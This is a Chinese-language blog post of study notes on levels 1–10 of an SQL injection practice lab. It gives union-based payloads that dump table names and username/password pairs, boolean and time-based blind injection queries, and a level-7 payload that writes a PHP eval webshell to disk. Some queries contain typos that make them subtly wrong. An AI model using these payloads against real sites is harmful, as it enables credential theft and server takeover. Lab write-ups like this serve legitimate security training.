<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>sql1~10 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="基础知识 select system_user()&#x2F;user()显示系统用户 select database()显示数据库 select version()musql版本 select @@database安装路径 select @@version_compile_os 操纵系统    第一关 ?id&#x3D;1‘报错，说明我们所填入的内容被存在’   ’之间，会变成‘1’‘，mysq">
<meta property="og:type" content="article">
<meta property="og:title" content="sql1~10">
<meta property="og:url" content="http://example.com/2024/02/07/sql1-10/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="基础知识 select system_user()&#x2F;user()显示系统用户 select database()显示数据库 select version()musql版本 select @@database安装路径 select @@version_compile_os 操纵系统    第一关 ?id&#x3D;1‘报错，说明我们所填入的内容被存在’   ’之间，会变成‘1’‘，mysq">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-02-07T13:56:54.000Z">
<meta property="article:modified_time" content="2024-02-07T13:57:31.997Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sql1-10" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/02/07/sql1-10/" class="article-date">
  <time class="dt-published" datetime="2024-02-07T13:56:54.000Z" itemprop="datePublished">2024-02-07</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      sql1~10
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><strong>基础知识</strong></p>
<p>select system_user()&#x2F;user()显示系统用户</p>
<p>select database()显示数据库</p>
<p>select version()musql版本</p>
<p>select @@database安装路径</p>
<p>select @@version_compile_os 操纵系统</p>
<ul>
<li></li>
</ul>
<p><strong>第一关</strong></p>
<p>?id&#x3D;1‘报错，说明我们所填入的内容被存在’   ’之间，会变成‘1’‘，mysql会报错</p>
<ul>
<li></li>
</ul>
<p>order by 1，2，3…查询有多少列</p>
<ul>
<li></li>
</ul>
<p>union select 1,2,schema_name from information_schema schemata–+</p>
<p>取出数据库名(3处为回显点)</p>
<ul>
<li></li>
</ul>
<p>group_concat（）函数</p>
<p>concat_ws(‘~’,A,B)函数</p>
<p>&#x2F;?id&#x3D;-1’ union select 1,2,concat_ws(‘~’,username,password) from security.users–+</p>
<p>取出username<del>password形式，最好将‘</del>’转换成0x+~的十六进制</p>
<ul>
<li></li>
</ul>
<p>?id&#x3D;-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’security’–+取出security库里面所有表</p>
<p>其中table_schema&#x3D;’security’不推荐，会引入单引号问题，建议改成十六进制，0x＋security十六进制表示</p>
<ul>
<li></li>
</ul>
<p>?id&#x3D;-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’users’–+取出users表里的列数据</p>
<ul>
<li></li>
</ul>
<p>?id&#x3D;-1’ union select 1,2,group_concat(password) from security.users–+取出security库users表password列对应的数据</p>
<ul>
<li></li>
</ul>
<p><strong>第二关</strong></p>
<p>SELECT * FROM users WHERE id&#x3D;1’ LIMIT 0,1 这个报错说明原代码id&#x3D;后面没有’‘，因此没有必要加’</p>
<p>其余部分跟第一关没有区别</p>
<ul>
<li></li>
</ul>
<p><strong>第三关</strong></p>
<p>SELECT * FROM users WHERE id&#x3D;(‘1’) LIMIT 0,1 ，用（）包裹起来</p>
<p>用1‘）–+注入，其他与前两关一样</p>
<ul>
<li></li>
</ul>
<p><strong>第四关</strong></p>
<p>SELECT * FROM users WHERE id&#x3D;(“1”) LIMIT 0,1 </p>
<p>用1“）–+注入，其他与前两关一样</p>
<ul>
<li></li>
</ul>
<p><strong>基础知识</strong></p>
<p>select left(database(),1)&#x3D;’s’   判断database（）前一位是否为s，是返回1，否返回0</p>
<ul>
<li></li>
</ul>
<p>regexp  匹配目标，如果成功返回1，失败返回0</p>
<p>——select user（） regexp ’r‘，user（）结果为root，成立，返回1</p>
<p>——select user（） regexp ’root‘，user（）结果为root，成立，返回1</p>
<p>——select user（） regexp ’rot‘，user（）结果为root，不成立，返回0</p>
<ul>
<li></li>
</ul>
<p>like函数 和regexp类似，不过语句略有区别</p>
<p>——select user（） like ’r%‘和——select user（） regexp ’r‘一个效果</p>
<ul>
<li></li>
</ul>
<p>substr(a,b,c)从b位置开始，截取a字符串c位长度</p>
<p>——select database((select database()),1,1)&#x3D;’s’判断database（）第一位是否为s</p>
<ul>
<li></li>
</ul>
<p>ascii（）把里面的字符串转换成askii码</p>
<ul>
<li></li>
</ul>
<p><strong>第五关</strong></p>
<p>布尔盲注——正确的时候输出一些语句，之前的方法没有回显点了，不能联合查询</p>
<p>?id&#x3D;1’ order by 3–+最多到3，表明只有三列</p>
<p>?id&#x3D;1’ and left((select database()),1)&#x3D;’s’–+返回正常，说明 left((select database()),1)&#x3D;’s’的值为1，第一位为s</p>
<ul>
<li></li>
</ul>
<p>用burp suite暴力破解，根据返回长度，看出正确字母</p>
<ul>
<li></li>
</ul>
<p>另一种方法：and ascii(substr((select schema_naame from information_schema.schemata limit,1,1),1,1))&gt;156 (通过二分法判断)</p>
<p>通过上面方法获得数据库名</p>
<p>其他部分依旧用同样方法来获得</p>
<p><strong>第六关</strong></p>
<p>第六关和第五关基本相同，不过把语句中的id&#x3D;‘xxx’变成了id&#x3D;“xxx”</p>
<ul>
<li></li>
</ul>
<p><strong>补充知识</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> variables <span class="keyword">like</span> <span class="string">&#x27;%secure%&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>查看 查看**<code>secure_file_priv</code>**的值 </p>
<p>secure_file_priv &#96;为NULL禁止导出文件，默认值</p>
<p>secure_file_priv&#96;指定地址限制导出地址只能在此 secure_file_priv&#x3D;”D:&#x2F;“</p>
<p>secure_file_priv为空可以导出到任意文件 &#96;secure_file_priv&#x3D;</p>
<ul>
<li></li>
</ul>
<p>一句话木马</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39190897/article/details/86772765">https://blog.csdn.net/weixin_39190897/article/details/86772765</a></p>
<ul>
<li></li>
</ul>
<p>load file() 读取本地文件</p>
<ul>
<li></li>
</ul>
<p>‘内容’ into outfile ‘路径’ ‘名称’ 写入文件</p>
<ul>
<li></li>
</ul>
<p>if（condition，A，B）</p>
<p>condition为true，A，condition判定为false，B</p>
<ul>
<li></li>
</ul>
<p><strong>第七关</strong></p>
<p>？id&#x3D;-1’)) union select 1,2,’<code>&lt;?php @eval($_POST[&quot;crow&quot;];?&gt;</code>‘ into outfile ‘C:\xxx\Less-7\a.php’)–+</p>
<p>写入一句话木马，用中国蚁剑破解（crow为密码），获得网站的webshell</p>
<ul>
<li></li>
</ul>
<p><strong>第八关</strong></p>
<p>可以像第五关一样布尔盲注确定数据库名称等</p>
<p>时间盲注?id&#x3D;1’ and if（askii(substr((select database()),1,1))&gt;10,1,sleep(5))–+然后再控制器里面看哪个值返回慢。这一句用来判断数据库长度，此方法也可以判断数据库名称内容等</p>
<ul>
<li></li>
</ul>
<p><strong>第九关</strong></p>
<p>布尔盲注不可用，无论布尔值为0，或者1，不会产生输出区别</p>
<p>但是可以使用第八关时间盲注</p>
<p><strong>第十关</strong></p>
<p>和第九关大致上一样，把id&#x3D;’1‘换成了id&#x3D;“1”</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/02/07/sql1-10/" data-id="cltd4gtoy0008u8b5gqyc9ya1" data-title="sql1~10" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/02/09/sql11-15/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          sql11~15
        
      </div>
    </a>
  
  
    <a href="/2024/02/03/sql/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">sql</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" rel="tag">html, css, js基础学习</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/html-css-js%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/" style="font-size: 10px;">html, css, js基础学习</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">March 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/02/">February 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/01/">January 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/03/04/phototype-1/">phototype_1</a>
          </li>
        
          <li>
            <a href="/2024/03/03/phototype/">phototype</a>
          </li>
        
          <li>
            <a href="/2024/03/03/n-ez-unserilize/">n_ez_unserilize</a>
          </li>
        
          <li>
            <a href="/2024/02/29/fc/">fc</a>
          </li>
        
          <li>
            <a href="/2024/02/23/serialize/">serialize</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>